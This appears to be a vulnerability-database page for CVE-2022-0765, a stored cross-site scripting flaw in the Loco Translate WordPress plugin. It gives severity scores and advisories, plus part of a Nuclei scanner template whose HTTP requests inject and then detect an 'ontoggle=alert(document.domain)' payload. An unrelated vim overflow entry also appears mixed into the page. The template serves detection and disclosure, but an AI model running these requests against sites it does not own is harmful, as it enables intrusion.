CVE-2022-0765
published 2022-04-18CVE-2022-0765: The Loco Translate WordPress plugin before 2.6.1 does not properly remove inline events from elements in the source translation strings before outputting them…
PriorityP335medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EXPLOIT
EPSS
4.01%
89.3th percentile
The Loco Translate WordPress plugin before 2.6.1 does not properly remove inline events from elements in the source translation strings before outputting them in the editor in the plugin admin panel, allowing any user with access to the plugin (Translator and Administrator by default) to add arbitrary javascript payloads to the source strings leading to a stored cross-site scripting (XSS) vulnerability.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| loco_translate_project | loco_translate | < 2.6.1 | 2.6.1 |
CVSS provenance
nvdv3.15.4MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pr4c-mq97-968p: The Loco Translate WordPress plugin before 2
ghsa_unreviewed·2022-04-19
CVE-2022-0765 [MEDIUM] CWE-79 GHSA-pr4c-mq97-968p: The Loco Translate WordPress plugin before 2
The Loco Translate WordPress plugin before 2.6.1 does not properly remove inline events from elements in the source translation strings before outputting them in the editor in the plugin admin panel, allowing any user with access to the plugin (Translator and Administrator by default) to add arbitrary javascript payloads to the source strings leading to a stored cross-site scripting (XSS) vulnerability.
Red Hat
vim: Heap-based Buffer Overflow
vendor_redhat·2022-12-02·CVSS 9.8
CVE-2022-3520 [CRITICAL] CWE-787 vim: Heap-based Buffer Overflow
vim: Heap-based Buffer Overflow
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0765.
Statement: Red Hat Product Security has rated this issue as having a Low security impact, because the "victim" has to run an untrusted file IN SCRIPT MODE. Someone who is running untrusted files in script mode is equivalent to someone just taking a random python script and running it.
For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.
Mitigation: Untrusted vim scripts with -s [scriptin] are not recommended to run.
Package: vim (Red Hat Enterprise Linux 6) - Out of support scope
Package:
No detection rules found.
Nuclei
WordPress Loco Translate < 2.6.1 - Cross-Site Scripting
nuclei·CVSS 5.4
CVE-2022-0765 [MEDIUM] WordPress Loco Translate < 2.6.1 - Cross-Site Scripting
WordPress Loco Translate '>"
msgstr ""
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="action"
loco_json
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="route"
save
------WebKitFormBoundaryXssTest
Content-Disposition: form-data; name="loco-nonce"
{{nonce}}
------WebKitFormBoundaryXssTest--
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "POT file saved")
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin.php?path=plugins%2Floco-translate%2Flanguages%2Floco-translate.pot&bundle=loco-translate%2Floco.php&domain=loco-translate&page=loco-plugin&action=file-edit HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "ontoggle=alert(document.domain)>")
condition: and
# digest: 4b0a0
No writeups or analysis indexed.
2022-04-18
Published